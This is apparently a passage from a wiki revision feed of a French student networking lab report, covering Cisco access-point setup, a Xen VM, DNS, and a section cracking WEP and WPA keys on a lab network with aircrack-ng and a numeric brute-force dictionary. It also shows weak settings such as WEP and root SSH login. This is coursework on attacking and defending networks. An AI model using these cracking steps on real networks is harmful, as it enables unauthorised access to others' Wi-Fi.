Il faut autoriser les  adresses mac désignés à ce connecter aux point d’accès et refuser l’accès des autres &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ap(config)#no access-list 701 deny  0000.0000.0000 ffff.ffff.ffff               &lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe7.6403  0000.0000.0000               &lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe6.edb1  0000.0000.0000 &lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe7.19f3  0000.0000.0000&lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe6.edb1  0000.0000.0000 &lt;br /&gt;
ap(config)#access-list 701 deny    0000.0000.0000  ffff.ffff.ffff &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Configuration du SSID &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ap(config)#dot11 ssid T2&lt;br /&gt;
ap(config-ssid)#dot11 ssid T2 &lt;br /&gt;
ap(config-ssid)#authentication open&lt;br /&gt;
ap(config-ssid)#guest-mode &lt;br /&gt;
ap(config)#interface dot11Radio0 &lt;br /&gt;
&lt;br /&gt;
ap(config-if)#ssid T2&lt;br /&gt;
ap(config-if)#encryption key 1&lt;br /&gt;
ap(config-if)#encryption key 1 size 40bit 0 01abcd1532 transmit-key&lt;br /&gt;
ap(config-if)#encryption mode Wep mandatory &lt;br /&gt;
end&lt;br /&gt;
&lt;br /&gt;
ap(config)#interface Dot11Radio0&lt;br /&gt;
ap(config-if)#no shutdown&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour voir si des machines sont connecté sur le point d’accès  &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
sh do11 associations&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h5&amp;gt;    1) Configuration du Wifi sur l'eeePC &amp;lt;/h5&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Configuration:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@heron:/home/pifou# cat /etc/network/interfaces&lt;br /&gt;
source /etc/network/interfaces.d/*&lt;br /&gt;
&lt;br /&gt;
# The loopback network interface&lt;br /&gt;
auto lo&lt;br /&gt;
iface lo inet loopback&lt;br /&gt;
&lt;br /&gt;
# Ethernet interface&lt;br /&gt;
#auto eth0&lt;br /&gt;
#iface eth0 inet static&lt;br /&gt;
#  address 172.26.79.241&lt;br /&gt;
#  netmask 255.255.240.0&lt;br /&gt;
#  gateway 172.26.79.254&lt;br /&gt;
&lt;br /&gt;
auto wlan0&lt;br /&gt;
iface wlan0 inet static&lt;br /&gt;
	wireless-mode managed&lt;br /&gt;
	wireless-essid T2&lt;br /&gt;
	wireless-key 1111111111&lt;br /&gt;
	address 172.26.79.61&lt;br /&gt;
	netmask 255.255.240.0&lt;br /&gt;
	gateway 172.26.79.254&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
conexion au PA&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ifup wlan0&lt;br /&gt;
iwconfig wlan0 essid T2&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
on est bien connecté :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
wlan0     IEEE 802.11bgn  ESSID:&amp;quot;T2&amp;quot;  &lt;br /&gt;
          Mode:Managed  Frequency:2.447 GHz  Access Point: C4:14:3C:12:EA:00   &lt;br /&gt;
          Bit Rate=54 Mb/s   Tx-Power=20 dBm   &lt;br /&gt;
          Retry short limit:7   RTS thr:off   Fragment thr:off&lt;br /&gt;
          Encryption key:1111-1111-11&lt;br /&gt;
          Power Management:off&lt;br /&gt;
          Link Quality=70/70  Signal level=-38 dBm  &lt;br /&gt;
          Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0&lt;br /&gt;
          Tx excessive retries:0  Invalid misc:4104   Missed beacon:0&lt;br /&gt;
&lt;br /&gt;
lo        no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
eth0      no wireless extensions.&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;Partie II - Installation de ma machine virtuel &amp;lt;/h2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
// Conexion au serveur &lt;br /&gt;
ssh root@cordouan.insecserv.deule.net&lt;br /&gt;
&lt;br /&gt;
// Création de la Machine virtuel ( nom : chien)&lt;br /&gt;
xen-create-image --hostname chien --ip 193.48.57.181 --dir /usr/local/xen&lt;br /&gt;
&lt;br /&gt;
// On observe la virtualisation&lt;br /&gt;
tail -f /var/log/xen-tools/chien.log&lt;br /&gt;
&lt;br /&gt;
root@cordouan:~# cd /etc/xen/&lt;br /&gt;
root@cordouan:/etc/xen# vim chien.cfg &lt;br /&gt;
// on met plus de memoire  =&amp;gt; 1024&lt;br /&gt;
// conexion en mode bridge=IMA2a&lt;br /&gt;
&lt;br /&gt;
root@cordouan:/etc/xen# xl list&lt;br /&gt;
root@cordouan:/etc/xen# xl create chien.cfg&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
connexion à notre MV:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ssh root@cordouan.insecserv.deule.net&lt;br /&gt;
root@cordouan:/etc/xen# xl console chien&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
/etc/ssh/sshd_config&lt;br /&gt;
PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
if down eth0 &lt;br /&gt;
ifup etho&lt;br /&gt;
apt-get purge network-manage systemd &lt;br /&gt;
/etc/inittable&lt;br /&gt;
// fin ligne tty0 ==&amp;gt; hvc0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
// Configuration de eth0&lt;br /&gt;
# The primary network interface&lt;br /&gt;
auto eth0&lt;br /&gt;
iface eth0 inet static&lt;br /&gt;
 address 193.48.57.181&lt;br /&gt;
 netmask 255.255.255.240&lt;br /&gt;
 gatway 193.48.57.190&lt;br /&gt;
&lt;br /&gt;
root@chien:~# ifdown eth0 &lt;br /&gt;
root@chien:~# ifup eth0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Serveur DNS&lt;br /&gt;
modification du fichier /var/cache/bind option&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
nano /etc/bind/named.conf.options &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
   59  apt-get install vim strace tcpdump &lt;br /&gt;
   60  apt-get install host&lt;br /&gt;
   61  host -t ni love-in-the-world.space&lt;br /&gt;
   62  host -t any love-in-the-world.space&lt;br /&gt;
   68  vim named.conf.options &lt;br /&gt;
   69  cp db.local db.love-in-the-world&lt;br /&gt;
   70  cat named.conf.default-zones &lt;br /&gt;
   71  vim named.conf.local &lt;br /&gt;
   73  vim db.love-in-the-world &lt;br /&gt;
   service bind9 stop&lt;br /&gt;
   76  service bind9 start&lt;br /&gt;
   77  cat /var/log/daemon.log&lt;br /&gt;
   78  vim db.love-in-the-world &lt;br /&gt;
   service bind9 stop&lt;br /&gt;
   vim db.love-in-the-world &lt;br /&gt;
   service bind9 start&lt;br /&gt;
   cat /var/log/daemon.log&lt;br /&gt;
   cat /var/log/daemon.log&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;Partie III - Installation de Debian sur les nouvelles machines &amp;lt;/h2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;Partie IV - Cassage d'une cles Wifi &amp;lt;/h2&amp;gt;&lt;br /&gt;
&amp;lt;h4&amp;gt;a) Préparation &amp;lt;/h4&amp;gt;&lt;br /&gt;
- Instalation aircrack-ng&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
apt-get install aircrack-ng firmware ralink&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
- Instalation du port usb-Wifi&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
apt-get install firmware ralink&lt;br /&gt;
airmon-ng start wlan1&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h4&amp;gt;b) Cassage d'une cles WEP &amp;lt;/h4&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Je scan le reseaux Wifi: &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
airodump-ng mon0 --channel 5&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
J’identifie le ssid de cracotte06 et je met les donnée  dans un fichier nommé fcracotte06&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 root@Discus:/home/pifou# airodump-ng mon0 --channel 5 --bssid 04:DA:D2:9C:50:55 -w&lt;br /&gt;
fcracotte06&lt;br /&gt;
&lt;br /&gt;
CH 5 ][ Elapsed: 0 s ][ 2015-11-20 09:05 &lt;br /&gt;
&lt;br /&gt;
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID&lt;br /&gt;
&lt;br /&gt;
04:DA:D2:9C:50:55 -55 28 29 420 116 5 54e. WEP WEP cracotte06 &lt;br /&gt;
&lt;br /&gt;
BSSID STATION PWR Rate Lost Frames Probe &lt;br /&gt;
&lt;br /&gt;
04:DA:D2:9C:50:55 00:0F:B5:92:23:74 -48 36e-54e 80 456 &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
La capture a donc commencé &lt;br /&gt;
&lt;br /&gt;
Dans un autre terminal:&lt;br /&gt;
Je vais analyser mon fichier de capture pour casser la cles.&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ls&lt;br /&gt;
aircrack-ng fcracotte06-01.cap&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
apres quelque minutes on obtient la cles &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
                 [00:06:58] Tested 965565 keys (got 60459 IVs)&lt;br /&gt;
&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    0/  1   AA(85504) EA(73728) 60(70144) 0C(69120) 33(68608) &lt;br /&gt;
    1    0/  1   AA(77824) 25(74496) BC(70400) 6C(70144) 3B(69632) &lt;br /&gt;
    2    0/  1   AA(79872) 3E(70912) 76(70400) 5C(70144) 01(68864) &lt;br /&gt;
    3    4/  5   AA(71680) FA(68608) 41(68352) 38(68096) 49(68096) &lt;br /&gt;
    4    0/  1   AA(86016) A1(70912) 80(69632) 2A(68352) 65(68352) &lt;br /&gt;
    5    0/  1   AA(85760) AF(73216) C6(71424) 5A(71168) 25(70400) &lt;br /&gt;
    6    0/  1   AA(75520) 26(70400) CB(70400) 46(69888) 1C(69632) &lt;br /&gt;
    7    0/  1   AA(83968) 18(71680) 4C(71424) 74(70144) 1E(69632) &lt;br /&gt;
    8    0/  1   AA(82176) 6F(70912) F7(70144) FB(69632) 17(68864) &lt;br /&gt;
    9    0/  3   D7(73216) 97(71168) A4(70400) BA(70144) FE(69632) &lt;br /&gt;
   10    0/  1   5F(78336) D6(72960) 46(71424) CB(68608) 8D(68352) &lt;br /&gt;
   11   13/  1   48(67072) 60(67072) F6(66816) AC(66560) 2B(66048) &lt;br /&gt;
   12    0/  1   BB(79580) A7(71096) 8B(69960) 13(69196) 68(68424) &lt;br /&gt;
&lt;br /&gt;
             KEY FOUND! [ AA:AA:AA:AA:AA:AA:AA:AA:AA:AA:BB:BB:BB ] &lt;br /&gt;
	Decrypted correctly: 100%&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h4&amp;gt;c) Cassage d'une cles WPA&amp;lt;/h4&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
airodump-ng --encrypt wpa mon0&lt;br /&gt;
&lt;br /&gt;
# airodump-ng --encrypt wpa mon0 -c 7 --bssid 04:DA:D2:9C:50:55 -w wpacracotte06&lt;br /&gt;
&lt;br /&gt;
CH 7 ][ Elapsed: 26 mins ][ 2015-11-20 10:40 ][ WPA handshake: 04:DA:D2:9C:50:55 &lt;br /&gt;
&lt;br /&gt;
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID&lt;br /&gt;
&lt;br /&gt;
04:DA:D2:9C:50:55 -70 22 9735 1905 18 7 54e. WPA2 CCMP PSK cracotte06 &lt;br /&gt;
&lt;br /&gt;
BSSID STATION PWR Rate Lost Frames Probe &lt;br /&gt;
&lt;br /&gt;
04:DA:D2:9C:50:55 00:0F:B5:92:23:74 -70 54e- 1e 904 1249 &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 - creation d'un dictionaire :&lt;br /&gt;
code C:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
int main ()&lt;br /&gt;
{&lt;br /&gt;
int val=0;&lt;br /&gt;
for(val=0;val&amp;lt;99999999 ;val++)&lt;br /&gt;
{printf(&amp;quot;%08d\n&amp;quot;,val); }&lt;br /&gt;
return 0;&lt;br /&gt;
}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Compilation :&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
gcc -Wall Dictionnaire.c -o Dictionnaire&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Création :&lt;br /&gt;
On exécute le programme Dictionnaire et on renvoi les résultats dans le fichier Dico&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
./Dictionnaire &amp;gt; Dico&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Cassage de la cles: &lt;br /&gt;
après avoir récuperer le Handshake du Wifi carotte06&lt;br /&gt;
Je vais casser la clés en utilisant mon dictionnaire &amp;quot;Dico&amp;quot; le fichier &amp;quot;wpacracotte06-02.cap&amp;quot;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
mettre serveur messagerie &lt;br /&gt;
demander certificat&lt;br /&gt;
&lt;br /&gt;
securisation wifi &lt;br /&gt;
WPA-EAP&lt;/div&gt;</summary>
		<author><name>Mstrunc</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G3&amp;diff=23093</id>
		<title>TP sysres IMA2a5 2015/2016 G3</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G3&amp;diff=23093"/>
				<updated>2015-11-20T09:53:21Z</updated>
		
		<summary type="html">&lt;p&gt;Mstrunc : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&amp;lt;h1&amp;gt;Projet Système &amp;amp; Réseaux  IMA2A S9 &amp;lt;/h1&amp;gt;&lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;h2&amp;gt;Partie I - Configuration du point d’accès&amp;lt;/h2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h4&amp;gt;a) Restriction par adresse MAC &amp;lt;/h4&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ci-dessous, le tableau regroupant Les adresses et Vlan associés aux élèves :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;table&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Nom&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;adresse MAC&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Nounours&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e7::19:f3&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Jeuno&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e6:ed:b1&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;John&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:22:43:43:e7:7d&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Loki&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e7:64:03&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On récupère les adresses mac comme ci dessous.&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
pifou@heron:~$ su&lt;br /&gt;
Mot de passe : &lt;br /&gt;
root@heron:/home/pifou# ifconfig &lt;br /&gt;
lo        Link encap:Boucle locale  &lt;br /&gt;
          inet adr:127.0.0.1  Masque:255.0.0.0&lt;br /&gt;
          adr inet6: ::1/128 Scope:Hôte&lt;br /&gt;
          UP LOOPBACK RUNNING  MTU:65536  Metric:1&lt;br /&gt;
          RX packets:2348 errors:0 dropped:0 overruns:0 frame:0&lt;br /&gt;
          TX packets:2348 errors:0 dropped:0 overruns:0 carrier:0&lt;br /&gt;
          collisions:0 lg file transmission:0 &lt;br /&gt;
          RX bytes:244556 (238.8 KiB)  TX bytes:244556 (238.8 KiB)&lt;br /&gt;
&lt;br /&gt;
wlan0     Link encap:Ethernet  HWaddr 00:22:43:43:e7:7d  &lt;br /&gt;
          inet adr:172.26.79.61  Bcast:172.26.79.255  Masque:255.255.240.0&lt;br /&gt;
          adr inet6: fe80::222:43ff:fe43:e77d/64 Scope:Lien&lt;br /&gt;
          adr inet6: 2001:660:4401:6006:222:43ff:fe43:e77d/64 Scope:Global&lt;br /&gt;
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1&lt;br /&gt;
          RX packets:12046 errors:0 dropped:1471 overruns:0 frame:0&lt;br /&gt;
          TX packets:9787 errors:0 dropped:0 overruns:0 carrier:0&lt;br /&gt;
          collisions:0 lg file transmission:1000 &lt;br /&gt;
          RX bytes:7742849 (7.3 MiB)  TX bytes:1442360 (1.3 MiB)&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h5&amp;gt;    1) Configuration du point d’accès Cisco &amp;lt;/h5&amp;gt;&lt;br /&gt;
Conexion a la borne Cisco :&lt;br /&gt;
-Branchement en comunication serie sur le port RJ45 (Console de la Cisco).&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
pifou@zabeth04:~$ su&lt;br /&gt;
pifou@zabeth04:~$ minicom&lt;br /&gt;
&lt;br /&gt;
// conexion au point Cisco &lt;br /&gt;
ap#enable&lt;br /&gt;
ap#Config t &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Il faut autoriser les  adresses mac désignés à ce connecter aux point d’accès et refuser l’accès des autres &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ap(config)#no access-list 701 deny  0000.0000.0000 ffff.ffff.ffff               &lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe7.6403  0000.0000.0000               &lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe6.edb1  0000.0000.0000 &lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe7.19f3  0000.0000.0000&lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe6.edb1  0000.0000.0000 &lt;br /&gt;
ap(config)#access-list 701 deny    0000.0000.0000  ffff.ffff.ffff &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Configuration du SSID &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ap(config)#dot11 ssid T2&lt;br /&gt;
ap(config-ssid)#dot11 ssid T2 &lt;br /&gt;
ap(config-ssid)#authentication open&lt;br /&gt;
ap(config-ssid)#guest-mode &lt;br /&gt;
ap(config)#interface dot11Radio0 &lt;br /&gt;
&lt;br /&gt;
ap(config-if)#ssid T2&lt;br /&gt;
ap(config-if)#encryption key 1&lt;br /&gt;
ap(config-if)#encryption key 1 size 40bit 0 01abcd1532 transmit-key&lt;br /&gt;
ap(config-if)#encryption mode Wep mandatory &lt;br /&gt;
end&lt;br /&gt;
&lt;br /&gt;
ap(config)#interface Dot11Radio0&lt;br /&gt;
ap(config-if)#no shutdown&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour voir si des machines sont connecté sur le point d’accès  &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
sh do11 associations&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h5&amp;gt;    1) Configuration du Wifi sur l'eeePC &amp;lt;/h5&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Configuration:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@heron:/home/pifou# cat /etc/network/interfaces&lt;br /&gt;
source /etc/network/interfaces.d/*&lt;br /&gt;
&lt;br /&gt;
# The loopback network interface&lt;br /&gt;
auto lo&lt;br /&gt;
iface lo inet loopback&lt;br /&gt;
&lt;br /&gt;
# Ethernet interface&lt;br /&gt;
#auto eth0&lt;br /&gt;
#iface eth0 inet static&lt;br /&gt;
#  address 172.26.79.241&lt;br /&gt;
#  netmask 255.255.240.0&lt;br /&gt;
#  gateway 172.26.79.254&lt;br /&gt;
&lt;br /&gt;
auto wlan0&lt;br /&gt;
iface wlan0 inet static&lt;br /&gt;
	wireless-mode managed&lt;br /&gt;
	wireless-essid T2&lt;br /&gt;
	wireless-key 1111111111&lt;br /&gt;
	address 172.26.79.61&lt;br /&gt;
	netmask 255.255.240.0&lt;br /&gt;
	gateway 172.26.79.254&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
conexion au PA&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ifup wlan0&lt;br /&gt;
iwconfig wlan0 essid T2&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
on est bien connecté :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
wlan0     IEEE 802.11bgn  ESSID:&amp;quot;T2&amp;quot;  &lt;br /&gt;
          Mode:Managed  Frequency:2.447 GHz  Access Point: C4:14:3C:12:EA:00   &lt;br /&gt;
          Bit Rate=54 Mb/s   Tx-Power=20 dBm   &lt;br /&gt;
          Retry short limit:7   RTS thr:off   Fragment thr:off&lt;br /&gt;
          Encryption key:1111-1111-11&lt;br /&gt;
          Power Management:off&lt;br /&gt;
          Link Quality=70/70  Signal level=-38 dBm  &lt;br /&gt;
          Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0&lt;br /&gt;
          Tx excessive retries:0  Invalid misc:4104   Missed beacon:0&lt;br /&gt;
&lt;br /&gt;
lo        no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
eth0      no wireless extensions.&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;Partie II - Installation de ma machine virtuel &amp;lt;/h2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
// Conexion au serveur &lt;br /&gt;
ssh root@cordouan.insecserv.deule.net&lt;br /&gt;
&lt;br /&gt;
// Création de la Machine virtuel ( nom : chien)&lt;br /&gt;
xen-create-image --hostname chien --ip 193.48.57.181 --dir /usr/local/xen&lt;br /&gt;
&lt;br /&gt;
// On observe la virtualisation&lt;br /&gt;
tail -f /var/log/xen-tools/chien.log&lt;br /&gt;
&lt;br /&gt;
root@cordouan:~# cd /etc/xen/&lt;br /&gt;
root@cordouan:/etc/xen# vim chien.cfg &lt;br /&gt;
// on met plus de memoire  =&amp;gt; 1024&lt;br /&gt;
// conexion en mode bridge=IMA2a&lt;br /&gt;
&lt;br /&gt;
root@cordouan:/etc/xen# xl list&lt;br /&gt;
root@cordouan:/etc/xen# xl create chien.cfg&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
connexion à notre MV:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ssh root@cordouan.insecserv.deule.net&lt;br /&gt;
root@cordouan:/etc/xen# xl console chien&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
/etc/ssh/sshd_config&lt;br /&gt;
PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
if down eth0 &lt;br /&gt;
ifup etho&lt;br /&gt;
apt-get purge network-manage systemd &lt;br /&gt;
/etc/inittable&lt;br /&gt;
// fin ligne tty0 ==&amp;gt; hvc0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
// Configuration de eth0&lt;br /&gt;
# The primary network interface&lt;br /&gt;
auto eth0&lt;br /&gt;
iface eth0 inet static&lt;br /&gt;
 address 193.48.57.181&lt;br /&gt;
 netmask 255.255.255.240&lt;br /&gt;
 gatway 193.48.57.190&lt;br /&gt;
&lt;br /&gt;
root@chien:~# ifdown eth0 &lt;br /&gt;
root@chien:~# ifup eth0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Serveur DNS&lt;br /&gt;
modification du fichier /var/cache/bind option&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
nano /etc/bind/named.conf.options &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
   59  apt-get install vim strace tcpdump &lt;br /&gt;
   60  apt-get install host&lt;br /&gt;
   61  host -t ni love-in-the-world.space&lt;br /&gt;
   62  host -t any love-in-the-world.space&lt;br /&gt;
   68  vim named.conf.options &lt;br /&gt;
   69  cp db.local db.love-in-the-world&lt;br /&gt;
   70  cat named.conf.default-zones &lt;br /&gt;
   71  vim named.conf.local &lt;br /&gt;
   73  vim db.love-in-the-world &lt;br /&gt;
   service bind9 stop&lt;br /&gt;
   76  service bind9 start&lt;br /&gt;
   77  cat /var/log/daemon.log&lt;br /&gt;
   78  vim db.love-in-the-world &lt;br /&gt;
   service bind9 stop&lt;br /&gt;
   vim db.love-in-the-world &lt;br /&gt;
   service bind9 start&lt;br /&gt;
   cat /var/log/daemon.log&lt;br /&gt;
   cat /var/log/daemon.log&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;Partie III - Installation de Debian sur les nouvelles machines &amp;lt;/h2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;Partie IV - Cassage d'une cles Wifi &amp;lt;/h2&amp;gt;&lt;br /&gt;
&amp;lt;h4&amp;gt;a) Préparation &amp;lt;/h4&amp;gt;&lt;br /&gt;
- Instalation aircrack-ng&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
apt-get install aircrack-ng firmware ralink&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
- Instalation du port usb-Wifi&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
apt-get install firmware ralink&lt;br /&gt;
airmon-ng start wlan1&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h4&amp;gt;b) Cassage d'une cles WEP &amp;lt;/h4&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Je scan le reseaux Wifi: &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
airodump-ng mon0 --channel 5&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
J’identifie le ssid de cracotte06 et je met les donnée  dans un fichier nommé fcracotte06&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
airodump-ng mon0 --channel 5 --bssid 04:DA:D2:9C:50:55 -w fcracotte06&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
La capture a donc commencé &lt;br /&gt;
